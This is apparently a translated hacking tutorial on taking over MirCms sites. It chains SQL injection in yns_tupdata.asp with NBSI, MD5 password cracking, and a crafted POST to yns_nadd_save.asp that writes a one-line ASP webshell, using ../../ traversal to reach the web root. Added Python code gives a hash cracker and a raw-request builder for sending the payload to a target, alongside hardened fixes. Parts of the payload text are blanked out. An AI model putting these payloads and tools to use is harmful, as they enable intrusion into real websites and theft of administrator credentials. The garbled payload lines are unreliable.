SoFunction
Updated on 2025-04-10

Going further: obtaining the legendary MirCms WebShell

In issue 6 of Black Defense (2005), Lion Lion wrote about a vulnerability in the MirCms voting subsystem. After reading it, I thought that a system with login-verification bugs of that kind probably has other flaws that can be pushed further. This article chains those flaws to obtain a WebShell.

1. Obtaining the administrator account and password
yns_tupdata.asp in the site root has a SQL injection vulnerability that we can use to obtain administrator accounts and password hashes. Look at the code snippet below.
If (("t_id") <> "") Then
  rst__MMColParam = ("t_id")
End If
……
 = "SELECT * FROM t_type WHERE t_id = " + Replace(rst__MMColParam, "'", "''") + ""
The only filtering applied to t_id is doubling single quotes, and the value is then concatenated into the SQL statement without quotes around it, so a numeric payload such as 1 or 1=1 goes straight through. Open NBSI and enter http://xxx/yns_tupdata.asp?t_id=1 or 1=1 as the injection address. Because the system's source code can be downloaded, there is no need to guess table and column names; once NBSI has finished, we have some administrator usernames and password hashes.
The passwords are stored as MD5 hashes (the 16-character form) and the admin backend also checks a Session, so we have no choice but to recover the original password. Run the hash against a dictionary of common passwords and hope for the best ^_^ Here I recovered the account <If Cloud Knows> 49ba59abbe56e057 => 123456. OK! Log in to the backend with this account. (Note: any level-1 account will do, and the passwords at that level are usually fairly simple ^_^)
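Two points in this section are easy to check offline. The Python below is an added example, not code from MirCms or from the original article: it re-creates the query construction from yns_tupdata.asp against an in-memory SQLite table with a few made-up rows, shows why doubling single quotes does nothing for an unquoted numeric parameter, contrasts it with an integer allowlist plus a bound parameter, and runs a small dictionary attack against the 16-character MD5 hash quoted above. The t_name column, the sample rows, the wordlist and the function names are assumptions.

```python
import hashlib
import sqlite3

# Constructed stand-in for MirCms's t_type table: t_id is the column named
# in the article, t_name and the rows are made up for this example.
SAMPLE_ROWS = [(1, "news"), (2, "announcements"), (3, "internal")]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_type (t_id INTEGER, t_name TEXT)")
    conn.executemany("INSERT INTO t_type VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def dreamweaver_query(t_id):
    """Rebuilds the query the way the article shows it: single quotes are
    doubled, but the value is concatenated into an unquoted numeric
    comparison, so the escaping never comes into play."""
    escaped = t_id.replace("'", "''")  # Replace(rst__MMColParam, "'", "''")
    return "SELECT * FROM t_type WHERE t_id = " + escaped


def rows_for(t_id):
    """Vulnerable lookup: returns the rows the concatenated query selects."""
    conn = _connect()
    try:
        return conn.execute(dreamweaver_query(t_id)).fetchall()
    finally:
        conn.close()


def is_valid_t_id(value):
    """Allowlist check: the only acceptable t_id is a plain, short integer."""
    return value.isdigit() and len(value) <= 9


def rows_for_hardened(t_id):
    """Validate the parameter, then bind it instead of concatenating it."""
    if not is_valid_t_id(t_id):
        raise ValueError("t_id must be a positive integer")
    conn = _connect()
    try:
        return conn.execute(
            "SELECT * FROM t_type WHERE t_id = ?", (int(t_id),)
        ).fetchall()
    finally:
        conn.close()


def md5_16(password):
    """16-character MD5 as used by many ASP sites of the period: characters
    8..24 of the 32-character hex digest."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


def crack_md5_16(target, wordlist):
    """Dictionary attack against a 16-character MD5; returns the plaintext
    or None if no candidate matches."""
    target = target.lower()
    for candidate in wordlist:
        if md5_16(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    print(dreamweaver_query("1 or 1=1"))
    print(len(rows_for("1")), "row(s) for t_id=1")
    print(len(rows_for("1 or 1=1")), "row(s) for t_id=1 or 1=1")
    # Constructed wordlist; the hash is the one quoted in the article.
    print(crack_md5_16("49ba59abbe56e057", ["password", "admin", "123456"]))
```

The escaping in the original is the stock Dreamweaver recordset pattern, which is only meaningful when the value sits inside quotes; for a numeric column the fix is the allowlist plus a bound parameter, not more escaping.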
2. Obtaining the WebShell
First, look at this snippet from yns_nadd_save.asp.
mm_path = ((("t_dir").Value)&"/"&(("ts_dir").Value)&"/" 
&("n_fpath")&"/"&("n_fname")) 
… 
Set fout = (mm_path) 
 pencat 
 
The program takes n_fname from the form, builds mm_path from it without any extension check, and then uses the FileSystemObject to create a file with n_fname as its name. So all we have to do is set the value of n_fname to  , and an ASP webshell can be created on the server without difficulty. Next, let's see how the content of that file is produced.
N_Title=("n_title") 
… 
mm_template_path = ("templates/type_template/type_son_template/detail_template.htm") 
… 
set fso_line = (mm_template_path,1,True)  
pencat=fso_line.readall 
end if 
pencat=replace(pencat,"t_title",n_title) 
So the program reads detail_template.htm, substitutes the placeholders, and writes the result out as the generated file. The t_title placeholder is replaced with our article title, and that is where we put the ASP webshell code. Let's try it: open WinSock Expert and submit an article from the backend. The captured request looks like this:
POST /yns_nadd_save.asp HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/ 
-powerpoint, application/msword, */* 
Referer: http://xxx/MirCMS_Add.asp 
Accept-Language: zh-cn 
Content-Type: application/x-www-form-urlencoded 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) 
Host: 
Content-Length:199 
Connection: Keep-Alive 
Cache-Control: no-cache 
Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF 

n_tid=52&n_tsid=56&n_sid=&n_title=test&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1 
Now change the value of n_fname to , and change the value of n_title to the one-line webshell we usually use. Note that the ASP code has to be URL-encoded before it goes into the form: <SCRIPT%20RUNAT=SERVER%20LANGUAGE=JAVASCRIPT>eval(('#')%2B'')</SCRIPT>. Finally, don't forget to recompute the packet size and update the Content-Length value. Anyone who has worked through the online upload vulnerability already knows this part, so here is my modified request directly.
POST /yns_nadd_save.asp HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/ 
-powerpoint, application/msword, */* 
Referer: http://xxx/MirCMS_Add.asp 
Accept-Language: zh-cn 
Content-Type: application/x-www-form-urlencoded 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) 
Host: 
Content-Length: 261 
Connection: Keep-Alive 
Cache-Control: no-cache 
Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF 

n_tid=52&n_tsid=56&n_sid=&n_title=<SCRIPT%20RUNAT=SERVER%20LANGUAGE=JAVASCRIPT>eval(('#')%2B'')</SCRIPT>&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1 
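Recomputing Content-Length by hand is where hand-edited captures usually break, especially when the form carries multibyte values such as the GBK-encoded n_author above. The Python below is an added example, not from the article: it URL-encodes the form fields with the GBK charset (the captured %C8%E7... bytes are GBK, not UTF-8), assembles the raw request with the length computed from the encoded body, and includes a small reader that pulls the header back out so the two can be compared before the request goes over netcat. The host, path, cookie and field values are constructed.

```python
from urllib.parse import urlencode

# Constructed form modelled on the article's capture: the field names are
# the CMS's, the values are made up (n_fname is deliberately left empty).
SAMPLE_FIELDS = {
    "n_tid": "52", "n_tsid": "56", "n_sid": "",
    "n_title": "test",
    "n_author": "如果云知道",          # zh-cn site: must be sent as GBK
    "n_mpic": "", "n_rpic": "", "n_fname": "", "n_fpath": "2005-6-6",
    "n_date": "2005-6-6 6:50:22", "n_content": "ttt", "MM_insert": "form1",
}


def encode_form(fields, encoding="gbk"):
    """application/x-www-form-urlencoded body as bytes. Non-ASCII values
    are encoded in the given charset before percent-encoding, so the
    resulting length is the one the server will see."""
    return urlencode(fields, encoding=encoding).encode("ascii")


def build_post(host, path, fields, cookie, encoding="gbk"):
    """Assemble a raw HTTP/1.1 POST with Content-Length taken from the
    encoded body rather than typed by hand."""
    body = encode_form(fields, encoding)
    headers = [
        "POST %s HTTP/1.1" % path,
        "Host: %s" % host,
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(body),
        "Cookie: %s" % cookie,
        "Connection: close",
    ]
    return "\r\n".join(headers).encode("ascii") + b"\r\n\r\n" + body


def content_length_of(request_bytes):
    """Read the Content-Length header back from a raw request (None if absent)."""
    head, _, _ = request_bytes.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1].strip())
    return None


def body_of(request_bytes):
    """The bytes after the blank line, i.e. what Content-Length must cover."""
    return request_bytes.partition(b"\r\n\r\n")[2]


if __name__ == "__main__":
    # Constructed host and cookie; swap in the target and a valid backend session.
    req = build_post("xxx", "/yns_nadd_save.asp", SAMPLE_FIELDS,
                     "ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF")
    print(req.decode("ascii"))
    print("declared:", content_length_of(req), "actual:", len(body_of(req)))
```

Write the bytes to a file and feed it to nc; editing the payload afterwards means running build_post again, since every change to n_title shifts the length.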
Finally, send the modified request with nc, and the webshell turns up under MirCMS_Html/xxx/Year-Month-Day/. If the administrator is particularly paranoid, ASP execution may have been disabled for the MirCMS_Html directory, but that doesn't matter: prefix the n_fname value with ../../ so that the file is written to the root directory instead. With the WebShell in hand, the rest is up to you ^_^
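To make the two defects in yns_nadd_save.asp concrete, here is an added Python re-creation of the save step; it is not the CMS's code. The vulnerable version does what the ASP does: it builds the output path straight from the form fields with no extension check and substitutes the title into the template verbatim, so an .asp file name, a ../-prefixed name, or a server-side script block in n_title all go through. The hardened version pins the base directory instead of reading it from the form, accepts only a bare .htm/.html file name, checks that the resolved path stays inside the output directory, and HTML-escapes the substituted fields. The template text, the sample form, the directory layout and the function names are assumptions.

```python
import html
import os
import tempfile

# Constructed stand-in for detail_template.htm; t_title is the placeholder
# named in the article, t_content is assumed.
TEMPLATE = "<html><head><title>t_title</title></head><body>t_content</body></html>"

# Constructed form modelled on the article's POST; field names are the CMS's,
# the values are made up.
SAMPLE_FORM = {
    "t_dir": "MirCMS_Html", "ts_dir": "news", "n_fpath": "2005-6-6",
    "n_fname": "demo.htm", "n_title": "test", "n_content": "ttt",
}

ALLOWED_EXT = {".htm", ".html"}


def make_webroot():
    """Fresh temporary directory standing in for the site root."""
    return os.path.realpath(tempfile.mkdtemp(prefix="mircms-"))


def render(template, form):
    # Mirrors replace(pencat, "t_title", n_title): raw substitution, no escaping.
    return template.replace("t_title", form["n_title"]).replace("t_content", form["n_content"])


def save_article_vulnerable(webroot, form):
    """Mirrors the ASP: mm_path = t_dir/ts_dir/n_fpath/n_fname, written as-is."""
    mm_path = os.path.normpath(os.path.join(
        webroot, form["t_dir"], form["ts_dir"], form["n_fpath"], form["n_fname"]))
    os.makedirs(os.path.dirname(mm_path), exist_ok=True)
    with open(mm_path, "w", encoding="utf-8") as fout:
        fout.write(render(TEMPLATE, form))
    return mm_path


def safe_target_path(webroot, form):
    """Hardened path construction: fixed base directory, bare file name,
    extension allowlist, and a containment check on the resolved path."""
    fname = form["n_fname"]
    if (not fname or fname in (".", "..") or "/" in fname or "\\" in fname
            or fname != os.path.basename(fname)):
        raise ValueError("n_fname must be a bare file name")
    if os.path.splitext(fname)[1].lower() not in ALLOWED_EXT:
        raise ValueError("n_fname must end in .htm or .html")
    base = os.path.realpath(os.path.join(webroot, "MirCMS_Html"))  # not taken from the form
    target = os.path.realpath(os.path.join(base, form["ts_dir"], form["n_fpath"], fname))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("target escapes the output directory")
    return target


def save_article_hardened(webroot, form):
    """Validated path plus HTML-escaped substitutions, so the generated page
    can carry neither an executable extension nor server-side script."""
    target = safe_target_path(webroot, form)
    safe_form = dict(form, n_title=html.escape(form["n_title"]),
                     n_content=html.escape(form["n_content"]))
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "w", encoding="utf-8") as fout:
        fout.write(render(TEMPLATE, safe_form))
    return target


if __name__ == "__main__":
    root = make_webroot()
    # Constructed payload in the spirit of the article's one-liner.
    evil = dict(SAMPLE_FORM, n_fname="x.asp",
                n_title="<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval('x')</SCRIPT>")
    print("vulnerable wrote:", save_article_vulnerable(root, evil))
    print("traversal wrote:", save_article_vulnerable(root, dict(SAMPLE_FORM, n_fname="../../../x.asp")))
    for bad in ("x.asp", "../../../x.htm"):
        try:
            save_article_hardened(root, dict(SAMPLE_FORM, n_fname=bad))
        except ValueError as err:
            print("hardened rejected %r: %s" % (bad, err))
    print("hardened wrote:", save_article_hardened(root, SAMPLE_FORM))
```

Note that the containment check alone is not enough: an .asp file inside MirCMS_Html still executes unless the web server has script execution disabled for that directory, which is exactly the situation the last paragraph describes. Both the extension allowlist and the escaping are needed.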